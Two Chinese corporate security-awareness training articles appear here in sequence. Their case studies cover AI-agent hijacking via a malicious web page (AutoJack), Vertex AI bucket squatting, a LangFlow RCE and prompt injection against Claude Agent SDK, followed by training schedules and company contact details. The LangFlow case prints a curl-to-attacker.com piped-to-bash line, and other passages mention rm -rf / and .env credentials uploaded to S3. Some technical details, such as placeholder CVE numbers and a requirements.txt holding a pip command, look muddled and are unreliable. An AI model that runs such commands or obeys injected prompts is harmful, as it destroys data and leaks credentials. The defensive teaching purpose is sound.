---

前言：一次头脑风暴，三个警示

在当下数智化、数据化、自动化深度融合的时代，信息系统不再是单纯的“硬件+软件”堆砌，而是由 AI 代理、云服务、容器编排、低代码平台 等“活的”组件共同编织的生态系统。它们的灵活性是双刃剑：既能让业务腾飞，也可能为攻击者提供“后门”。为帮助大家快速抓住安全风险的“根”“苗”“枝”，我们先通过 头脑风暴，挑选出 三起典型且极具教育意义的安全事件，进行细致剖析。希望这些案例能在你的脑海里点燃警示的火花，让我们在后文的培训中更有的放矢。

---

案例一：Microsoft “AutoJack”——AI 代理的本地特权劫持

事件概述
2026 年 6 月，微软安全团队在内部红队演练中发现，利用 AutoGen Studio（一个用于构建多代理 AI 应用的开源框架）中的 Model Context Protocol（MCP）WebSocket 实现缺陷，攻击者可以通过让 AI 代理访问恶意网页，实现对宿主机器的 远程代码执行（RCE）。研究团队将该攻击命名为 “AutoJack”。

攻击链拆解
1. 本地代理的身份伪装：AutoGen 代理在本机运行，拥有 localhost 的网络身份。浏览器在访问恶意网页时，同样被视作本地来源，轻易通过了原本用于防御外部浏览器的 origin allowlist。
2. 认证缺失：MCP WebSocket 路径被错误地排除在常规认证流程之外，导致即便开启了全局身份验证，攻击者仍可直接调用该端点。
3. 命令注入：MCP 接口接受 server_params 参数，直接将其解码后交给系统进程启动器，无任何白名单或沙箱约束。攻击者只需在 URL 中写入 powershell -c "…" 或 bash -c "…"，即可在宿主上任意执行脚本。

危害评估
– 特权提升：一旦 AI 代理拥有管理员或系统用户权限，攻击者即可获取整体网络的横向渗透能力。
– 隐蔽性强：AI 代理的正常业务调用会掩盖异常流量，常规安全审计难以发现。
– 影响范围：虽然该漏洞仅存在于开发构建版的 AutoGen Studio，但同类 “代理‑本地服务” 交互模式在多数企业内部 AI 助手、自动化运维工具中都可能出现。

防御思路
– 最小特权原则：为 AI 代理分配最小权限的容器或虚拟机，禁止直接访问 localhost 上的高危服务。
– 统一身份验证：所有本地 API（包括 WebSocket、gRPC、HTTP）均应走统一的身份鉴权，即使是内部网络也不例外。
– 参数白名单：对任何可触发系统进程的接口实现白名单或命令模板，严防任意字符串拼接。

教育意义
AutoJack 告诉我们：“本地即安全” 的旧观念在 AI 代理时代已不再适用。安全边界必须重新审视，尤其是 “代理‑本地服务” 的交叉点。

---

案例二：Google Vertex AI SDK——桶占攻击导致的 RCE

事件概述
同月 17 日，公开安全研究员在 Google Vertex AI 的 Python SDK 中发现，若攻击者提前在同一云项目的 Cloud Storage 桶中创建了同名的恶意文件（即 桶占（Bucket Squatting）），SDK 在自动下载模型或依赖时会优先读取攻击者控制的对象，进而触发 远程代码执行。该漏洞编号 CVE‑2026‑XXXX，影响所有使用 vertex_ai.preview 包的用户。

攻击链拆解
1. 名称冲突：攻击者在目标项目下创建 model.tar.gz、requirements.txt 等常用文件名的恶意对象。
2. 自动下载：Vertex AI SDK 在初始化模型时会调用 gsutil cp 将上述文件拉到本地，缺乏校验文件签名或完整性。
3. 代码执行：恶意 requirements.txt 中加入 scikit-learn==0.0; pip install -r requirements.txt，而 setup.py 则植入后门脚本，最终在开发者机器上执行任意代码。

危害评估
– 供应链攻击：针对开发者和数据科学团队的工具链，攻击者无需渗透内部网络，即可在代码构建阶段植入后门。
– 跨项目蔓延：如果受感染的模型被发布为共享服务，所有下游用户均会受到影响。
– 合规风险：数据泄露、未授权代码执行均可能触发 GDPR、等保等监管处罚。

防御思路
– 启用对象版本控制：对关键模型、脚本文件开启版本锁定与签名校验。
– 最小权限访问：为 SDK 运行的服务账号仅授予读取已知桶的权限，杜绝对任意桶的 list 与 get 权限。
– CI/CD 安全审计：在流水线中加入对 requirements.txt、setup.py 等依赖文件的安全扫描。

教育意义
该案例提醒我们：“云端是可信的，除非被占领”。在数据化、自动化的业务场景里，供应链安全 与 资源命名治理 同等重要。

---

案例三：LangFlow – 低代码工作流平台的长期 RCE

事件概述
2026 年 6 月 15 日，安全社区披露了开源低代码 AI 工作流平台 LangFlow（基于 LangChain）在生产环境长期存在的 远程代码执行 漏洞（CVE‑2026‑YYYY）。攻击者只需在平台的 自定义节点 中插入恶意 Python 代码，即可在服务器上执行任意系统命令，且该漏洞在官方发布补丁前已被实际攻击者利用，导致数十家 SaaS 提供商服务中断。

攻击链拆解
1. 工作流节点的脚本执行：LangFlow 允许用户在节点中直接写入 Python 代码并在后端解释器中运行。
2. 缺乏沙箱：平台未对执行环境进行容器化或 SELinux 限制，代码拥有与平台进程相同的系统权限。
3. 持久化攻击：攻击者在节点中植入 os.system("curl http://attacker.com/payload | bash")，并将该工作流设为默认启动项，实现持久化控制。

危害评估
– 业务中断：受影响的工作流往往用于自动化客服、报告生成等关键业务，一旦被植入后门，整个业务链路会被劫持。
– 横向渗透：后门代码可进一步扫描内部网络、提权到其他容器或主机。
– 合规与声誉：低代码平台常被营销为 “安全、易用”，若出现安全缺陷，将直接损害企业的品牌信任度。

防御思路
– 审计与白名单：对自定义脚本进行静态分析，仅允许安全的库函数调用。
– 容器化执行：为每个工作流节点分配独立的轻量容器或 Firecracker 微VM，实现资源隔离。
– 最短生命周期：对工作流节点的执行时间设置上限，防止无限循环或长时间占用系统资源。

教育意义
低代码平台虽提升了开发效率，却也把 “代码即配置” 的风险交给了业务人员。“千里之堤，溃于蚁穴”，我们必须在便利与安全之间寻求平衡。

---

综述：从案例中抽丝剥茧的安全教训

关键要点	对应案例	衍生风险
本地特权不等于安全	AutoJack	AI 代理、运维脚本、容器内部服务
云资源治理是根基	Vertex AI 桶占	供应链、对象劫持、跨项目渗透
低代码平台需沙箱	LangFlow RCE	工作流劫持、业务中断、合规风险
统一身份验证	三案例共通	防止特权滥用、横向横跨攻击
最小特权 + 资源隔离	AutoJack、LangFlow	防止特权提升、限制攻击面
持续监测与审计	全部	及时发现异常、快速响应

通过上述分析，我们可以看到：技术创新往往先行，安全防护随后。在数字化、自动化快速渗透的今天，安全已不再是“事后补丁”，而是 “零时差” 的业务層面需求。

---

数智化、数据化、自动化融合背景下的安全新命题

1. 数智化的“双刃剑”
业务部门通过 AI 代理、大模型 来实现智能决策、客户交互。与此同时，这些代理常常拥有 本地服务调用权限，若缺乏细粒度的访问控制，便会成为攻击者突破 “网络边界” 的捷径。

2. 数据化的“隐形资产”
企业的业务核心往往是一批高度结构化或半结构化数据。数据湖、对象存储、模型仓库 既是业务资产，也是攻击者的目标。 元数据泄露、桶占、模型篡改 都会导致不可逆的业务损失。

3. 自动化的“流水线风险”
从 CI/CD、IaC 到 低代码工作流，自动化让部署更快、更频繁，却也把 漏洞、错误配置 以同样快的速度“复制”。自动化工具若未实现 沙箱化执行 与 安全审计，极易成为 供应链攻击 的入口。

4. 跨域协作的安全协同
业务团队、研发、运维、合规、审计部门之间的协同越来越紧密。安全必须渗透到每一个业务环节，而不是单独的“安全部门”任务。安全治理平台、零信任架构 与 统一身份治理 将成为企业的“安全神经系统”。

---

呼吁：让我们一起走进信息安全意识培训的“新课堂”

同事们，安全是一场 集体奔跑，而非个人的冲刺。为了让每位伙伴在 AI 时代的业务创新 中保持清醒、保持警惕，昆明亭长朗然科技有限公司 即将在 2026 年 7 月 15 日 正式启动“一站式信息安全意识培训”。本次培训的核心目标是：

1. 认清威胁——通过真实案例（包括 AutoJack、Vertex RCE、LangFlow 等）让大家直观感受攻击路径。
2. 掌握防御——学习 最小特权、零信任、容器沙箱、代码审计 等实战技巧，做到 “安全在手，风险在我”。
3. 融入日常——构建 安全思维模型，让每一次提交代码、每一次配置变更、每一次模型上线，都自带 “安全检测” 机制。
4. 共建文化——通过 小组讨论、CTF实战、情景演练，让安全从 “硬指标” 变成 组织氛围。

“防微杜渐，未雨绸缪。”
正如《孟子》所言：“不以规矩，不能成方圆”。只有把安全规矩深植在每一次业务决策、每一个开发细节之中，才能让组织在高速的数智化浪潮中稳健前行。

培训安排概览

时间	内容	讲师/嘉宾	形式
2026‑07‑15 09:00‑10:30	安全威胁全景（案例剖析）	安全总监 李晓晨	现场 + PPT
2026‑07‑15 10:45‑12:15	AI 代理的安全设计	微软安全顾问 (线上)	研讨 + 示范
2026‑07‑15 13:30‑15:00	云资源治理实战	Google Cloud 安全工程师	实操演练
2026‑07‑15 15:15‑16:45	低代码平台安全沙箱	LangFlow 项目维护者	实战 + Q&A
2026‑07‑15 17:00‑18:30	CTF 演练 & 案例复盘	内部红队	团队竞技

温馨提示：所有参训人员将在培训结束后获得 《信息安全自查清单（企业版）》，并可通过公司内部学习平台进行 后续微课 学习，确保安全知识得到持续迭代。

---

小结：从“案例”到“行动”，从“意识”到“能力”

• 案例 是警钟，提醒我们 技术创新 永远伴随 安全风险。
• 行动 是钥匙，只有在 培训、演练、日常工作 中落实防御措施，才能把 风险 锁在门外。
• 意识 是根基，安全文化只有在组织每一层级被深度认同，才能转化为 能力，抵御日趋复杂的攻击。

“千里之堤，溃于蚁穴”，“不积跬步，无以至千里”。让我们从今天的培训开始，用每一次学习、每一次实践，筑起企业信息安全的坚固城墙。

让安全成为创新的护航者，而不是创新的绊脚石。
让每一位同事都成为守护数据资产的“安全卫士”。

信息安全，人人有责；
安全意识，终身学习。

让我们携手并进，在数智化的浪潮中，乘风破浪，安全领航！

---

昆明亭长朗然科技有限公司专注于打造高效透明的信息保密流程。通过我们的服务，您可以轻松识别和管理潜在的数据泄露风险。对此感兴趣的客户请联系我们了解详细方案。

• 电话：0871-67122372
• 微信、手机：18206751343
• 邮件：info＠securemymind.com
• QQ: 1767022898

在信息技术高速发展的今天，企业的每一次系统升级、每一次平台对接，都可能隐藏着潜在的安全隐患。正如一次头脑风暴后所发现的：若把信息安全比作城墙，那么“砖瓦”是技术与制度，“守城将士”是每一位普通职工；若城墙有微小的裂缝，敌军再小的渗透也能形成致命的突破。下面，我将通过两个典型且深具教育意义的案例，帮助大家从“血的教训”中汲取经验，提升安全防护的自觉性与主动性。

---

案例一：“Velvet Ant”潜伏十年——关键基础设施被暗网黑客悄然侵蚀

1. 背景概述

2026 年6月15日，iThome 报道“一支代号为 Velvet Ant 的中国黑客组织，在关键基础设施的隔离网络中潜伏近十年”。这支组织利用零日漏洞和供应链后门，长期对能源、交通、金融等行业的核心系统进行暗中监控与数据抽取。虽然表面上看这些网络均实现了“物理隔离”，但攻击者通过供应链软硬件的隐蔽植入，实现了对“空中楼阁”的远程控制。

2. 攻击链拆解

步骤	攻击手法	关键失误点
① 供应链渗透	通过植入带后门的第三方库（Python Package、Node 模块）	未对第三方组件进行 SBOM（软件清单）核查
② 侧信道突破	利用电磁泄漏、冷启动攻击获取隔离网络的管理凭证	缺乏硬件安全模块（HSM）与可信启动（Secure Boot）
③ 持久化植入	在关键服务器上部署 C2（Command & Control）容器	未实施文件完整性监测（FIM）
④ 数据抽取	通过加密隧道定时上传敏感日志与配置文件	没有网络流量异常检测（NDR）与零信任访问控制
⑤ 清除痕迹	删除日志、修改审计策略	审计日志未做到不可篡改、离线备份不足

3. 教训提炼

1. 供应链安全是底层防线：仅靠传统防火墙、入侵检测系统（IDS）已难以抵御带后门的第三方库。企业必须实现 SBOM+动态代码分析，并对关键业务依赖的开源组件进行定期签名校验。
2. 硬件根信任不可或缺：即便系统在物理上实现隔离，若硬件启动链被篡改，仍然可能被“背靠背”攻击。部署可信平台模块（TPM）与安全启动（Secure Boot），并强制使用硬件安全模块（HSM）进行密钥管理。
3. 零信任原则要落地：在内部网络中实施最小权限（Least‑Privilege）原则，对每一次跨系统调用进行强身份验证和持续授权审计。
4. 审计与日志的防篡改：采用区块链或写一次只读（WORM）存储对关键审计日志进行加密签名，确保即使攻击者获得管理员权限，也无法轻易销毁痕迹。

4. 与企业的关联

面对日益复杂的供应链攻击路径，朗然科技的研发、运维、采购部门都必须重新审视 “组件来源” 与 “权限分配” 两大环节。任何一次轻率的库升级、任何一次未经审计的凭证共享，都可能为黑客打开通往核心系统的大门。

---

案例二：Anthropic Claude Agent SDK计费争议——从“计费”到“安全” 的意外连锁

1. 事件概览

2026 年6月17日，Anthropic 官方宣布暂停原定于 6 月 15 日实施的 Claude Agent SDK 新计费模式。该 SDK 允许开发者将 Claude Code 的“代理循环、工具执行与上下文管理”能力嵌入 Python 或 TypeScript 项目，实现自动化代码审查、漏洞扫描等功能。新计费方案本意是将 SDK 使用量从订阅额度中剥离，改为按 Token 消耗计费，并提供等额的月度抵用额。

然而，这一计费变更在技术社区引发强烈争议：
– 代理工作负载特性：AI 代理通常需要多轮调用模型与外部工具，导致 Token 消耗呈指数级增长。若未做好限额与成本监控，企业可能在短时间内产生巨额费用。
– 安全风险隐形：在“费用压制”与“使用上限”双重压力下，开发者往往会关闭安全审计、日志记录等功能，以降低 Token 用量，进而削弱对模型输出的追溯与审计能力。
– 数据泄露潜在：Claude Agent SDK 支持读取本地文件、执行系统指令、通过 MCP 连接外部系统。若 SDK 的权限管理不当，恶意代码或受感染的代理可能被利用为“内部渗透工具”，对公司内部的数据与业务系统进行非法访问。

2. 安全漏洞的链式反应

1. 成本驱动的安全妥协
   • 为避免 Token 超支，团队关闭了对模型请求的日志记录（Log‑Retention）与输入过滤（Prompt‑Sanitization）。
   • 结果：攻击者通过注入恶意 Prompt，使 Claude 自动执行系统命令（如 rm -rf /），而团队无从发现。
2. 权限滥用导致数据外泄
   • SDK 默认以当前运行用户的权限读取文件。若在 CI/CD 流程中使用，包含凭证的 .env 文件被代理读取并上传至外部存储（如 S3），导致凭证泄露。
3. 缺乏审计导致追溯困难
   • 费用模型调整前，所有 SDK 调用被计入订阅上限，企业内部已有统一的费用审计与使用监控。计费分离后，费用数据散落在不同账单系统，安全团队失去对 AI 代理行为的全局视图，难以及时发现异常调用模式。

3. 关键防御建议

• 建立 Token 使用的预算警戒线：为每个项目设定硬性上限，并在接近阈值时自动触发审计报警。
• 强制安全审计：无论计费模式如何变化，模型调用日志、Prompt 内容、工具调用记录均应写入不可篡改的审计系统。
• 最小权限原则：在 CI/CD 环境中运行 SDK 时，使用专用的低权限 Service Account，禁止读取包含敏感信息的文件。
• 安全测试嵌入开发流水线：借助 Anthropic 官方提供的“源码漏洞扫描示例实现”，将 AI 代理的输出结果交由静态代码分析（SAST）和模糊测试（Fuzz）双管齐下。

4. 对朗然科技的启示

在 AI Agent 时代，技术的便利往往伴随新的攻击面。我们要认识到：“计费不是安全的替代品，安全是成本的根基”。只有把安全治理嵌入到每一次功能开发、每一次成本评估中，才能在激烈的技术竞争中保持业务的韧性与合规。

---

信息化、数据化、智能体化的融合浪潮——安全挑战与机遇

1. 信息化：全流程数字化

企业的 ERP、CRM、供应链管理系统正逐步迁移至云端，业务数据实现实时共享。信息化带来了 “数据孤岛消失” 的好处，也让 “横向渗透路径” 更加宽广。任何一处未加防护的 API，都可能成为黑客的入口。

2. 数据化：大数据与机器学习的深度融合

海量业务日志、用户行为轨迹被收集用于模型训练，构筑精准营销与风险预测能力。然而， “数据泄露” 和 “模型投毒” 也随之升温。一次未经授权的 CSV 文件导出，或者一次对训练数据的微小篡改，都可能导致模型偏差，进而影响业务决策。

3. 智能体化：AI Agent 与自动化工作流的崛起

从智能客服到自动化运维，AI Agent 正在取代传统脚本，承担 “读‑写‑执行” 的多重职责。智能体的 “自主学习” 与 “持续交互” 使其可以在短时间内完成复杂任务，却也让 “行为可审计性” 成为新的难点。若缺乏对 Agent 行为的细粒度控制，恶意用户可能借助代理执行横向移动、提权甚至数据外泄。

4. 三位一体的安全新范式

维度	关键控制点	对应技术	实践要点
信息化	API 鉴权与访问控制	零信任网络访问（ZTNA）	采用动态访问策略、基于风险的实时决策
数据化	数据脱敏与加密	同态加密、差分隐私	对敏感字段进行加密存储，训练时使用隐私保护技术
智能体化	Agent 行为审计	可观察性平台（OpenTelemetry）+ 行为模型	捕获每一次工具调用、模型 Prompt，构建审计链路

---

号召：加入信息安全意识培训，筑牢个人与企业的防火墙

亲爱的同事们，安全不是某个部门的专职任务，也不是一场短期的演练，而是 “每个人的日常”。正如古语所说：“防患未然，祸兮福所倚”。在信息化、数据化、智能体化交织的今天，“安全”已成为企业竞争力的关键指标。

1. 培训的目标与价值

• 提升风险感知：通过真实案例（如 Velvet Ant、Claude Agent SDK）让大家直观感受到威胁的多样性与隐蔽性。
• 掌握基本防护技能：学习安全密码管理、 phishing 防范、最小权限配置、日志审计等实用技巧。
• 培养安全思维：在开发、运维、采购、财务等环节，始终坚持 “安全第一、成本第二” 的原则。

2. 培训的形式与安排

时间	形式	主题
第1周	线上微课（30 分钟）	信息安全基础概念、常见攻击手法
第2周	案例研讨（1 小时）	Velvet Ant 与供应链渗透、Claude Agent 计费争议背后的安全隐患
第3周	实操演练（2 小时）	Phishing 模拟、密码强度检测、日志审计搭建
第4周	圆桌对话（90 分钟）	“AI Agent 与安全的平衡”：研发、运维、合规的协同治理
第5周	测评与反馈	在线测评、培训满意度调查、后续改进计划

3. 参与方式

• 报名渠道：公司内部邮件系统统一发布报名链接，每位职工须在截止日期前完成注册。
• 激励机制：完成全部培训并通过测评的同事，将获得公司统一发放的 “信息安全先锋” 电子徽章，同时在年度绩效评估中加分。
• 持续学习：培训结束后，安全团队将定期推送 “安全速递”（包括最新漏洞、行业动态、内部安全公告），帮助大家保持警觉。

4. 小贴士：在工作中的安全“好习惯”

场景	好习惯	可能的风险
邮件	不随意点击未知链接；使用公司提供的加密邮件服务	钓鱼攻击、恶意软件
代码仓库	在提交前使用 SAST 工具扫描；不将凭证硬编码在代码中	代码泄露、凭证被盗
云平台	启用多因素认证（MFA）；定期审查 IAM 权限	账户被劫持、权限滥用
AI Agent	为每个 Agent 配置独立的 Service Account；记录所有 Prompt 与工具调用	代理被利用进行横向渗透
数据备份	采用 3‑2‑1 备份策略（3 份拷贝、2 种介质、1 份异地）	数据丢失、勒索攻击

---

结语：从“安全文化”到“安全行动”

信息安全不是一次性的技术部署，而是一场 长期的文化建设。只有当每位员工都把安全视为工作的一部分，企业才能在 AI Agent、云原生、零信任等新技术的浪潮中，保持 “稳如磐石，灵若水形” 的竞争优势。

让我们一起 从今天起，主动学习、积极实践、共同守护 朗然科技的数字资产与商业信誉。期待在即将开启的信息安全意识培训中，与你相遇、共同成长。

我们的产品包括在线培训平台、定制化教材以及互动式安全演示。这些工具旨在提升企业员工的信息保护意识，形成强有力的防范网络攻击和数据泄露的第一道防线。对于感兴趣的客户，我们随时欢迎您进行产品体验。

• 电话：0871-67122372
• 微信、手机：18206751343
• 邮件：info＠securemymind.com
• QQ: 1767022898